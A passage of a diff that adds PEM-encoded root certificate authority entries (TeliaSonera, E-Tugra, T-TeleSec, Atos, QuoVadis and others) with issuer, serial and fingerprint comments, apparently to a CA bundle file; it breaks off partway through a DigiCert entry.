+nile98FRYB/e2guyLXW3Q0iT5/Z5xoRdgFlglPx4mI88k1HtQJAH32RjJMtOcQWh +15QaiDLxInQirqWm2BJpTGCjAu4r7NRjkgtevi92a6O2JryPA9gK8kxkRr05YuWW +6zRjESjMlfGt7+/cgFhI6Uu46mWs6fyAtbXIRfmswZ/ZuepiiI7E8UuDEq3mi4TW +nsLrgxifarsbJGAzcMzs9zLzXNl5fe+epP7JI8Mk7hWSsT2RTyaGvWZzJBPqpK5j +wa19hAM8EHiGG3njxPPyBJUgriOCxLM6AGK/5jYk4Ve6xx6QddVfP5VhK8E7zeWz +aGHQRiapIVJpLesux+t3zqY6tQMzT3bR51xUAV3LePTJDL/PEo4XLSNolOer/qmy +KwbQBM0= +-----END CERTIFICATE----- + +# Issuer: CN=TeliaSonera Root CA v1 O=TeliaSonera +# Subject: CN=TeliaSonera Root CA v1 O=TeliaSonera +# Label: "TeliaSonera Root CA v1" +# Serial: 199041966741090107964904287217786801558 +# MD5 Fingerprint: 37:41:49:1b:18:56:9a:26:f5:ad:c2:66:fb:40:a5:4c +# SHA1 Fingerprint: 43:13:bb:96:f1:d5:86:9b:c1:4e:6a:92:f6:cf:f6:34:69:87:82:37 +# SHA256 Fingerprint: dd:69:36:fe:21:f8:f0:77:c1:23:a1:a5:21:c1:22:24:f7:22:55:b7:3e:03:a7:26:06:93:e8:a2:4b:0f:a3:89 +-----BEGIN CERTIFICATE----- +MIIFODCCAyCgAwIBAgIRAJW+FqD3LkbxezmCcvqLzZYwDQYJKoZIhvcNAQEFBQAw +NzEUMBIGA1UECgwLVGVsaWFTb25lcmExHzAdBgNVBAMMFlRlbGlhU29uZXJhIFJv +b3QgQ0EgdjEwHhcNMDcxMDE4MTIwMDUwWhcNMzIxMDE4MTIwMDUwWjA3MRQwEgYD +VQQKDAtUZWxpYVNvbmVyYTEfMB0GA1UEAwwWVGVsaWFTb25lcmEgUm9vdCBDQSB2 +MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMK+6yfwIaPzaSZVfp3F +VRaRXP3vIb9TgHot0pGMYzHw7CTww6XScnwQbfQ3t+XmfHnqjLWCi65ItqwA3GV1 +7CpNX8GH9SBlK4GoRz6JI5UwFpB/6FcHSOcZrr9FZ7E3GwYq/t75rH2D+1665I+X +Z75Ljo1kB1c4VWk0Nj0TSO9P4tNmHqTPGrdeNjPUtAa9GAH9d4RQAEX1jF3oI7x+ +/jXh7VB7qTCNGdMJjmhnXb88lxhTuylixcpecsHHltTbLaC0H2kD7OriUPEMPPCs +81Mt8Bz17Ww5OXOAFshSsCPN4D7c3TxHoLs1iuKYaIu+5b9y7tL6pe0S7fyYGKkm +dtwoSxAgHNN/Fnct7W+A90m7UwW7XWjH1Mh1Fj+JWov3F0fUTPHSiXk+TT2YqGHe +Oh7S+F4D4MHJHIzTjU3TlTazN19jY5szFPAtJmtTfImMMsJu7D0hADnJoWjiUIMu +sDor8zagrC/kb2HCUQk5PotTubtn2txTuXZZNp1D5SDgPTJghSJRt8czu90VL6R4 +pgd7gUY2BIbdeTXHlSw7sKMXNeVzH7RcWe/a6hBle3rQf5+ztCo3O3CLm1u5K7fs +slESl1MpWtTwEhDcTwK7EpIvYtQ/aUN8Ddb8WHUBiJ1YFkveupD/RwGJBmr2X7KQ +arMCpgKIv7NHfirZ1fpoeDVNAgMBAAGjPzA9MA8GA1UdEwEB/wQFMAMBAf8wCwYD +VR0PBAQDAgEGMB0GA1UdDgQWBBTwj1k4ALP1j5qWDNXr+nuqF+gTEjANBgkqhkiG +9w0BAQUFAAOCAgEAvuRcYk4k9AwI//DTDGjkk0kiP0Qnb7tt3oNmzqjMDfz1mgbl +dxSR651Be5kqhOX//CHBXfDkH1e3damhXwIm/9fH907eT/j3HEbAek9ALCI18Bmx +0GtnLLCo4MBANzX2hFxc469CeP6nyQ1Q6g2EdvZR74NTxnr/DlZJLo961gzmJ1Tj +TQpgcmLNkQfWpb/ImWvtxBnmq0wROMVvMeJuScg/doAmAyYp4Db29iBT4xdwNBed +Y2gea+zDTYa4EzAvXUYNR0PVG6pZDrlcjQZIrXSHX8f8MVRBE+LHIQ6e4B4N4cB7 +Q4WQxYpYxmUKeFfyxiMPAdkgS94P+5KFdSpcc41teyWRyu5FrgZLAMzTsVlQ2jqI +OylDRl6XK1TOU2+NSueW+r9xDkKLfP0ooNBIytrEgUy7onOTJsjrDNYmiLbAJM+7 +vVvrdX3pCI6GMyx5dwlppYn8s3CQh3aP0yK7Qs69cwsgJirQmz1wHiRszYd2qReW +t88NkvuOGKmYSdGe/mBEciG5Ge3C9THxOUiIkCR1VBatzvT4aRRkOfujuLpwQMcn +HL/EVlP6Y2XQ8xwOFvVrhlhNGNTkDY6lnVuR3HYkUD/GKvvZt5y11ubQ2egZixVx +SK236thZiNSQvxaz2emsWWFUyBy6ysHK4bkgTI86k4mloMy/0/Z1pHWWbVY= +-----END CERTIFICATE----- + +# Issuer: CN=E-Tugra Certification Authority O=E-Tu\u011fra EBG Bili\u015fim Teknolojileri ve Hizmetleri A.\u015e. OU=E-Tugra Sertifikasyon Merkezi +# Subject: CN=E-Tugra Certification Authority O=E-Tu\u011fra EBG Bili\u015fim Teknolojileri ve Hizmetleri A.\u015e. OU=E-Tugra Sertifikasyon Merkezi +# Label: "E-Tugra Certification Authority" +# Serial: 7667447206703254355 +# MD5 Fingerprint: b8:a1:03:63:b0:bd:21:71:70:8a:6f:13:3a:bb:79:49 +# SHA1 Fingerprint: 51:c6:e7:08:49:06:6e:f3:92:d4:5c:a0:0d:6d:a3:62:8f:c3:52:39 +# SHA256 Fingerprint: b0:bf:d5:2b:b0:d7:d9:bd:92:bf:5d:4d:c1:3d:a2:55:c0:2c:54:2f:37:83:65:ea:89:39:11:f5:5e:55:f2:3c +-----BEGIN CERTIFICATE----- +MIIGSzCCBDOgAwIBAgIIamg+nFGby1MwDQYJKoZIhvcNAQELBQAwgbIxCzAJBgNV +BAYTAlRSMQ8wDQYDVQQHDAZBbmthcmExQDA+BgNVBAoMN0UtVHXEn3JhIEVCRyBC +aWxpxZ9pbSBUZWtub2xvamlsZXJpIHZlIEhpem1ldGxlcmkgQS7Fni4xJjAkBgNV +BAsMHUUtVHVncmEgU2VydGlmaWthc3lvbiBNZXJrZXppMSgwJgYDVQQDDB9FLVR1 +Z3JhIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTEzMDMwNTEyMDk0OFoXDTIz +MDMwMzEyMDk0OFowgbIxCzAJBgNVBAYTAlRSMQ8wDQYDVQQHDAZBbmthcmExQDA+ +BgNVBAoMN0UtVHXEn3JhIEVCRyBCaWxpxZ9pbSBUZWtub2xvamlsZXJpIHZlIEhp +em1ldGxlcmkgQS7Fni4xJjAkBgNVBAsMHUUtVHVncmEgU2VydGlmaWthc3lvbiBN +ZXJrZXppMSgwJgYDVQQDDB9FLVR1Z3JhIENlcnRpZmljYXRpb24gQXV0aG9yaXR5 +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4vU/kwVRHoViVF56C/UY +B4Oufq9899SKa6VjQzm5S/fDxmSJPZQuVIBSOTkHS0vdhQd2h8y/L5VMzH2nPbxH +D5hw+IyFHnSOkm0bQNGZDbt1bsipa5rAhDGvykPL6ys06I+XawGb1Q5KCKpbknSF +Q9OArqGIW66z6l7LFpp3RMih9lRozt6Plyu6W0ACDGQXwLWTzeHxE2bODHnv0ZEo +q1+gElIwcxmOj+GMB6LDu0rw6h8VqO4lzKRG+Bsi77MOQ7osJLjFLFzUHPhdZL3D +k14opz8n8Y4e0ypQBaNV2cvnOVPAmJ6MVGKLJrD3fY185MaeZkJVgkfnsliNZvcH +fC425lAcP9tDJMW/hkd5s3kc91r0E+xs+D/iWR+V7kI+ua2oMoVJl0b+SzGPWsut +dEcf6ZG33ygEIqDUD13ieU/qbIWGvaimzuT6w+Gzrt48Ue7LE3wBf4QOXVGUnhMM +ti6lTPk5cDZvlsouDERVxcr6XQKj39ZkjFqzAQqptQpHF//vkUAqjqFGOjGY5RH8 +zLtJVor8udBhmm9lbObDyz51Sf6Pp+KJxWfXnUYTTjF2OySznhFlhqt/7x3U+Lzn +rFpct1pHXFXOVbQicVtbC/DP3KBhZOqp12gKY6fgDT+gr9Oq0n7vUaDmUStVkhUX +U8u3Zg5mTPj5dUyQ5xJwx0UCAwEAAaNjMGEwHQYDVR0OBBYEFC7j27JJ0JxUeVz6 +Jyr+zE7S6E5UMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAULuPbsknQnFR5 +XPonKv7MTtLoTlQwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBCwUAA4ICAQAF +Nzr0TbdF4kV1JI+2d1LoHNgQk2Xz8lkGpD4eKexd0dCrfOAKkEh47U6YA5n+KGCR +HTAduGN8qOY1tfrTYXbm1gdLymmasoR6d5NFFxWfJNCYExL/u6Au/U5Mh/jOXKqY +GwXgAEZKgoClM4so3O0409/lPun++1ndYYRP0lSWE2ETPo+Aab6TR7U1Q9Jauz1c +77NCR807VRMGsAnb/WP2OogKmW9+4c4bU2pEZiNRCHu8W1Ki/QY3OEBhj0qWuJA3 ++GbHeJAAFS6LrVE1Uweoa2iu+U48BybNCAVwzDk/dr2l02cmAYamU9JgO3xDf1WK +vJUawSg5TB9D0pH0clmKuVb8P7Sd2nCcdlqMQ1DujjByTd//SffGqWfZbawCEeI6 +FiWnWAjLb1NBnEg4R2gz0dfHj9R0IdTDBZB6/86WiLEVKV0jq9BgoRJP3vQXzTLl +yb/IQ639Lo7xr+L0mPoSHyDYwKcMhcWQ9DstliaxLL5Mq+ux0orJ23gTDx4JnW2P +AJ8C2sH6H3p6CcRK5ogql5+Ji/03X186zjhZhkuvcQu02PJwT58yE+Owp1fl2tpD +y4Q08ijE6m30Ku/Ba3ba+367hTzSU8JNvnHhRdH9I2cNE3X7z2VnIp2usAnRCf8d +NL/+I5c30jn6PQ0GC7TbO6Orb1wdtn7os4I07QZcJA== +-----END CERTIFICATE----- + +# Issuer: CN=T-TeleSec GlobalRoot Class 2 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center +# Subject: CN=T-TeleSec GlobalRoot Class 2 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center +# Label: "T-TeleSec GlobalRoot Class 2" +# Serial: 1 +# MD5 Fingerprint: 2b:9b:9e:e4:7b:6c:1f:00:72:1a:cc:c1:77:79:df:6a +# SHA1 Fingerprint: 59:0d:2d:7d:88:4f:40:2e:61:7e:a5:62:32:17:65:cf:17:d8:94:e9 +# SHA256 Fingerprint: 91:e2:f5:78:8d:58:10:eb:a7:ba:58:73:7d:e1:54:8a:8e:ca:cd:01:45:98:bc:0b:14:3e:04:1b:17:05:25:52 +-----BEGIN CERTIFICATE----- +MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx +KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd +BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl +YyBHbG9iYWxSb290IENsYXNzIDIwHhcNMDgxMDAxMTA0MDE0WhcNMzMxMDAxMjM1 +OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy +aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50 +ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDIwggEiMA0G +CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCqX9obX+hzkeXaXPSi5kfl82hVYAUd +AqSzm1nzHoqvNK38DcLZSBnuaY/JIPwhqgcZ7bBcrGXHX+0CfHt8LRvWurmAwhiC +FoT6ZrAIxlQjgeTNuUk/9k9uN0goOA/FvudocP05l03Sx5iRUKrERLMjfTlH6VJi +1hKTXrcxlkIF+3anHqP1wvzpesVsqXFP6st4vGCvx9702cu+fjOlbpSD8DT6Iavq +jnKgP6TeMFvvhk1qlVtDRKgQFRzlAVfFmPHmBiiRqiDFt1MmUUOyCxGVWOHAD3bZ +wI18gfNycJ5v/hqO2V81xrJvNHy+SE/iWjnX2J14np+GPgNeGYtEotXHAgMBAAGj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS/ +WSA2AHmgoCJrjNXyYdK4LMuCSjANBgkqhkiG9w0BAQsFAAOCAQEAMQOiYQsfdOhy +NsZt+U2e+iKo4YFWz827n+qrkRk4r6p8FU3ztqONpfSO9kSpp+ghla0+AGIWiPAC +uvxhI+YzmzB6azZie60EI4RYZeLbK4rnJVM3YlNfvNoBYimipidx5joifsFvHZVw +IEoHNN/q/xWA5brXethbdXwFeilHfkCoMRN3zUA7tFFHei4R40cR3p1m0IvVVGb6 +g1XqfMIpiRvpb7PO4gWEyS8+eIVibslfwXhjdFjASBgMmTnrpMwatXlajRWc2BQN +9noHV8cigwUtPJslJj0Ys6lDfMjIq2SPDqO/nBudMNva0Bkuqjzx+zOAduTNrRlP +BSeOE6Fuwg== +-----END CERTIFICATE----- + +# Issuer: CN=Atos TrustedRoot 2011 O=Atos +# Subject: CN=Atos TrustedRoot 2011 O=Atos +# Label: "Atos TrustedRoot 2011" +# Serial: 6643877497813316402 +# MD5 Fingerprint: ae:b9:c4:32:4b:ac:7f:5d:66:cc:77:94:bb:2a:77:56 +# SHA1 Fingerprint: 2b:b1:f5:3e:55:0c:1d:c5:f1:d4:e6:b7:6a:46:4b:55:06:02:ac:21 +# SHA256 Fingerprint: f3:56:be:a2:44:b7:a9:1e:b3:5d:53:ca:9a:d7:86:4a:ce:01:8e:2d:35:d5:f8:f9:6d:df:68:a6:f4:1a:a4:74 +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIIXDPLYixfszIwDQYJKoZIhvcNAQELBQAwPDEeMBwGA1UE +AwwVQXRvcyBUcnVzdGVkUm9vdCAyMDExMQ0wCwYDVQQKDARBdG9zMQswCQYDVQQG +EwJERTAeFw0xMTA3MDcxNDU4MzBaFw0zMDEyMzEyMzU5NTlaMDwxHjAcBgNVBAMM +FUF0b3MgVHJ1c3RlZFJvb3QgMjAxMTENMAsGA1UECgwEQXRvczELMAkGA1UEBhMC +REUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCVhTuXbyo7LjvPpvMp +Nb7PGKw+qtn4TaA+Gke5vJrf8v7MPkfoepbCJI419KkM/IL9bcFyYie96mvr54rM +VD6QUM+A1JX76LWC1BTFtqlVJVfbsVD2sGBkWXppzwO3bw2+yj5vdHLqqjAqc2K+ +SZFhyBH+DgMq92og3AIVDV4VavzjgsG1xZ1kCWyjWZgHJ8cblithdHFsQ/H3NYkQ +4J7sVaE3IqKHBAUsR320HLliKWYoyrfhk/WklAOZuXCFteZI6o1Q/NnezG8HDt0L +cp2AMBYHlT8oDv3FdU9T1nSatCQujgKRz3bFmx5VdJx4IbHwLfELn8LVlhgf8FQi +eowHAgMBAAGjfTB7MB0GA1UdDgQWBBSnpQaxLKYJYO7Rl+lwrrw7GWzbITAPBgNV +HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFKelBrEspglg7tGX6XCuvDsZbNshMBgG +A1UdIAQRMA8wDQYLKwYBBAGwLQMEAQEwDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3 +DQEBCwUAA4IBAQAmdzTblEiGKkGdLD4GkGDEjKwLVLgfuXvTBznk+j57sj1O7Z8j +vZfza1zv7v1Apt+hk6EKhqzvINB5Ab149xnYJDE0BAGmuhWawyfc2E8PzBhj/5kP +DpFrdRbhIfzYJsdHt6bPWHJxfrrhTZVHO8mvbaG0weyJ9rQPOLXiZNwlz6bb65pc +maHFCN795trV1lpFDMS3wrUU77QR/w4VtfX128a961qn8FYiqTxlVMYVqL2Gns2D +lmh6cYGJ4Qvh6hEbaAjMaZ7snkGeRDImeuKHCnE96+RapNLbxc3G3mB/ufNPRJLv +KrcYPqcZ2Qt9sTdBQrC6YB3y/gkRsPCHe6ed +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 1 G3 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 1 G3 O=QuoVadis Limited +# Label: "QuoVadis Root CA 1 G3" +# Serial: 687049649626669250736271037606554624078720034195 +# MD5 Fingerprint: a4:bc:5b:3f:fe:37:9a:fa:64:f0:e2:fa:05:3d:0b:ab +# SHA1 Fingerprint: 1b:8e:ea:57:96:29:1a:c9:39:ea:b8:0a:81:1a:73:73:c0:93:79:67 +# SHA256 Fingerprint: 8a:86:6f:d1:b2:76:b5:7e:57:8e:92:1c:65:82:8a:2b:ed:58:e9:f2:f2:88:05:41:34:b7:f1:f4:bf:c9:cc:74 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIUeFhfLq0sGUvjNwc1NBMotZbUZZMwDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMSBHMzAeFw0xMjAxMTIxNzI3NDRaFw00 +MjAxMTIxNzI3NDRaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDEgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCgvlAQjunybEC0BJyFuTHK3C3kEakEPBtV +wedYMB0ktMPvhd6MLOHBPd+C5k+tR4ds7FtJwUrVu4/sh6x/gpqG7D0DmVIB0jWe +rNrwU8lmPNSsAgHaJNM7qAJGr6Qc4/hzWHa39g6QDbXwz8z6+cZM5cOGMAqNF341 +68Xfuw6cwI2H44g4hWf6Pser4BOcBRiYz5P1sZK0/CPTz9XEJ0ngnjybCKOLXSoh +4Pw5qlPafX7PGglTvF0FBM+hSo+LdoINofjSxxR3W5A2B4GbPgb6Ul5jxaYA/qXp +UhtStZI5cgMJYr2wYBZupt0lwgNm3fME0UDiTouG9G/lg6AnhF4EwfWQvTA9xO+o +abw4m6SkltFi2mnAAZauy8RRNOoMqv8hjlmPSlzkYZqn0ukqeI1RPToV7qJZjqlc +3sX5kCLliEVx3ZGZbHqfPT2YfF72vhZooF6uCyP8Wg+qInYtyaEQHeTTRCOQiJ/G +KubX9ZqzWB4vMIkIG1SitZgj7Ah3HJVdYdHLiZxfokqRmu8hqkkWCKi9YSgxyXSt +hfbZxbGL0eUQMk1fiyA6PEkfM4VZDdvLCXVDaXP7a3F98N/ETH3Goy7IlXnLc6KO +Tk0k+17kBL5yG6YnLUlamXrXXAkgt3+UuU/xDRxeiEIbEbfnkduebPRq34wGmAOt +zCjvpUfzUwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQUo5fW816iEOGrRZ88F2Q87gFwnMwwDQYJKoZIhvcNAQELBQAD +ggIBABj6W3X8PnrHX3fHyt/PX8MSxEBd1DKquGrX1RUVRpgjpeaQWxiZTOOtQqOC +MTaIzen7xASWSIsBx40Bz1szBpZGZnQdT+3Btrm0DWHMY37XLneMlhwqI2hrhVd2 +cDMT/uFPpiN3GPoajOi9ZcnPP/TJF9zrx7zABC4tRi9pZsMbj/7sPtPKlL92CiUN +qXsCHKnQO18LwIE6PWThv6ctTr1NxNgpxiIY0MWscgKCP6o6ojoilzHdCGPDdRS5 +YCgtW2jgFqlmgiNR9etT2DGbe+m3nUvriBbP+V04ikkwj+3x6xn0dxoxGE1nVGwv +b2X52z3sIexe9PSLymBlVNFxZPT5pqOBMzYzcfCkeF9OrYMh3jRJjehZrJ3ydlo2 +8hP0r+AJx2EqbPfgna67hkooby7utHnNkDPDs3b69fBsnQGQ+p6Q9pxyz0fawx/k +NSBT8lTR32GDpgLiJTjehTItXnOQUl1CxM49S+H5GYQd1aJQzEH7QRTDvdbJWqNj +ZgKAvQU6O0ec7AAmTPWIUb+oI38YB7AL7YsmoWTTYUrrXJ/es69nA7Mf3W1daWhp +q1467HxpvMc7hU6eFbm0FU/DlXpY18ls6Wy58yljXrQs8C097Vpl4KlbQMJImYFt +nh8GKjwStIsPm6Ik8KaN1nrgS7ZklmOVhMJKzRwuJIczYOXD +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 2 G3 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 2 G3 O=QuoVadis Limited +# Label: "QuoVadis Root CA 2 G3" +# Serial: 390156079458959257446133169266079962026824725800 +# MD5 Fingerprint: af:0c:86:6e:bf:40:2d:7f:0b:3e:12:50:ba:12:3d:06 +# SHA1 Fingerprint: 09:3c:61:f3:8b:8b:dc:7d:55:df:75:38:02:05:00:e1:25:f5:c8:36 +# SHA256 Fingerprint: 8f:e4:fb:0a:f9:3a:4d:0d:67:db:0b:eb:b2:3e:37:c7:1b:f3:25:dc:bc:dd:24:0e:a0:4d:af:58:b4:7e:18:40 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIURFc0JFuBiZs18s64KztbpybwdSgwDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMiBHMzAeFw0xMjAxMTIxODU5MzJaFw00 +MjAxMTIxODU5MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDIgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQChriWyARjcV4g/Ruv5r+LrI3HimtFhZiFf +qq8nUeVuGxbULX1QsFN3vXg6YOJkApt8hpvWGo6t/x8Vf9WVHhLL5hSEBMHfNrMW +n4rjyduYNM7YMxcoRvynyfDStNVNCXJJ+fKH46nafaF9a7I6JaltUkSs+L5u+9ym +c5GQYaYDFCDy54ejiK2toIz/pgslUiXnFgHVy7g1gQyjO/Dh4fxaXc6AcW34Sas+ +O7q414AB+6XrW7PFXmAqMaCvN+ggOp+oMiwMzAkd056OXbxMmO7FGmh77FOm6RQ1 +o9/NgJ8MSPsc9PG/Srj61YxxSscfrf5BmrODXfKEVu+lV0POKa2Mq1W/xPtbAd0j +IaFYAI7D0GoT7RPjEiuA3GfmlbLNHiJuKvhB1PLKFAeNilUSxmn1uIZoL1NesNKq +IcGY5jDjZ1XHm26sGahVpkUG0CM62+tlXSoREfA7T8pt9DTEceT/AFr2XK4jYIVz +8eQQsSWu1ZK7E8EM4DnatDlXtas1qnIhO4M15zHfeiFuuDIIfR0ykRVKYnLP43eh +vNURG3YBZwjgQQvD6xVu+KQZ2aKrr+InUlYrAoosFCT5v0ICvybIxo/gbjh9Uy3l +7ZizlWNof/k19N+IxWA1ksB8aRxhlRbQ694Lrz4EEEVlWFA4r0jyWbYW8jwNkALG +cC4BrTwV1wIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQU7edvdlq/YOxJW8ald7tyFnGbxD0wDQYJKoZIhvcNAQELBQAD +ggIBAJHfgD9DCX5xwvfrs4iP4VGyvD11+ShdyLyZm3tdquXK4Qr36LLTn91nMX66 +AarHakE7kNQIXLJgapDwyM4DYvmL7ftuKtwGTTwpD4kWilhMSA/ohGHqPHKmd+RC +roijQ1h5fq7KpVMNqT1wvSAZYaRsOPxDMuHBR//47PERIjKWnML2W2mWeyAMQ0Ga +W/ZZGYjeVYg3UQt4XAoeo0L9x52ID8DyeAIkVJOviYeIyUqAHerQbj5hLja7NQ4n +lv1mNDthcnPxFlxHBlRJAHpYErAK74X9sbgzdWqTHBLmYF5vHX/JHyPLhGGfHoJE ++V+tYlUkmlKY7VHnoX6XOuYvHxHaU4AshZ6rNRDbIl9qxV6XU/IyAgkwo1jwDQHV +csaxfGl7w/U2Rcxhbl5MlMVerugOXou/983g7aEOGzPuVBj+D77vfoRrQ+NwmNtd +dbINWQeFFSM51vHfqSYP1kjHs6Yi9TM3WpVHn3u6GBVv/9YUZINJ0gpnIdsPNWNg +KCLjsZWDzYWm3S8P52dSbrsvhXz1SnPnxT7AvSESBT/8twNJAlvIJebiVDj1eYeM +HVOyToV7BjjHLPj4sHKNJeV3UvQDHEimUF+IIDBu8oJDqz2XhOdT+yHBTw8imoa4 +WSr2Rz0ZiC3oheGe7IUIarFsNMkd7EgrO3jtZsSOeWmD3n+M +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 3 G3 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 3 G3 O=QuoVadis Limited +# Label: "QuoVadis Root CA 3 G3" +# Serial: 268090761170461462463995952157327242137089239581 +# MD5 Fingerprint: df:7d:b9:ad:54:6f:68:a1:df:89:57:03:97:43:b0:d7 +# SHA1 Fingerprint: 48:12:bd:92:3c:a8:c4:39:06:e7:30:6d:27:96:e6:a4:cf:22:2e:7d +# SHA256 Fingerprint: 88:ef:81:de:20:2e:b0:18:45:2e:43:f8:64:72:5c:ea:5f:bd:1f:c2:d9:d2:05:73:07:09:c5:d8:b8:69:0f:46 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIULvWbAiin23r/1aOp7r0DoM8Sah0wDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMyBHMzAeFw0xMjAxMTIyMDI2MzJaFw00 +MjAxMTIyMDI2MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDMgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCzyw4QZ47qFJenMioKVjZ/aEzHs286IxSR +/xl/pcqs7rN2nXrpixurazHb+gtTTK/FpRp5PIpM/6zfJd5O2YIyC0TeytuMrKNu +FoM7pmRLMon7FhY4futD4tN0SsJiCnMK3UmzV9KwCoWdcTzeo8vAMvMBOSBDGzXR +U7Ox7sWTaYI+FrUoRqHe6okJ7UO4BUaKhvVZR74bbwEhELn9qdIoyhA5CcoTNs+c +ra1AdHkrAj80//ogaX3T7mH1urPnMNA3I4ZyYUUpSFlob3emLoG+B01vr87ERROR +FHAGjx+f+IdpsQ7vw4kZ6+ocYfx6bIrc1gMLnia6Et3UVDmrJqMz6nWB2i3ND0/k +A9HvFZcba5DFApCTZgIhsUfei5pKgLlVj7WiL8DWM2fafsSntARE60f75li59wzw +eyuxwHApw0BiLTtIadwjPEjrewl5qW3aqDCYz4ByA4imW0aucnl8CAMhZa634Ryl +sSqiMd5mBPfAdOhx3v89WcyWJhKLhZVXGqtrdQtEPREoPHtht+KPZ0/l7DxMYIBp +VzgeAVuNVejH38DMdyM0SXV89pgR6y3e7UEuFAUCf+D+IOs15xGsIs5XPd7JMG0Q +A4XN8f+MFrXBsj6IbGB/kE+V9/YtrQE5BwT6dYB9v0lQ7e/JxHwc64B+27bQ3RP+ +ydOc17KXqQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQUxhfQvKjqAkPyGwaZXSuQILnXnOQwDQYJKoZIhvcNAQELBQAD +ggIBADRh2Va1EodVTd2jNTFGu6QHcrxfYWLopfsLN7E8trP6KZ1/AvWkyaiTt3px +KGmPc+FSkNrVvjrlt3ZqVoAh313m6Tqe5T72omnHKgqwGEfcIHB9UqM+WXzBusnI +FUBhynLWcKzSt/Ac5IYp8M7vaGPQtSCKFWGafoaYtMnCdvvMujAWzKNhxnQT5Wvv +oxXqA/4Ti2Tk08HS6IT7SdEQTXlm66r99I0xHnAUrdzeZxNMgRVhvLfZkXdxGYFg +u/BYpbWcC/ePIlUnwEsBbTuZDdQdm2NnL9DuDcpmvJRPpq3t/O5jrFc/ZSXPsoaP +0Aj/uHYUbt7lJ+yreLVTubY/6CD50qi+YUbKh4yE8/nxoGibIh6BJpsQBJFxwAYf +3KDTuVan45gtf4Od34wrnDKOMpTwATwiKp9Dwi7DmDkHOHv8XgBCH/MyJnmDhPbl +8MFREsALHgQjDFSlTC9JxUrRtm5gDWv8a4uFJGS3iQ6rJUdbPM9+Sb3H6QrG2vd+ +DhcI00iX0HGS8A85PjRqHH3Y8iKuu2n0M7SmSFXRDw4m6Oy2Cy2nhTXN/VnIn9HN +PlopNLk9hM6xZdRZkZFWdSHBd575euFgndOtBBj0fOtek49TSiIp+EgrPk2GrFt/ +ywaZWWDYWGWVjUTR939+J399roD1B0y2PpxxVJkES/1Y+Zj0 +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Assured ID Root G2 O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Assured ID Root G2 O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Assured ID Root G2" +# Serial: 15385348160840213938643033620894905419 +# MD5 Fingerprint: 92:38:b9:f8:63:24:82:65:2c:57:33:e6:fe:81:8f:9d +# SHA1 Fingerprint: a1:4b:48:d9:43:ee:0a:0e:40:90:4f:3c:e0:a4:c0:91:93:51:5d:3f +# SHA256 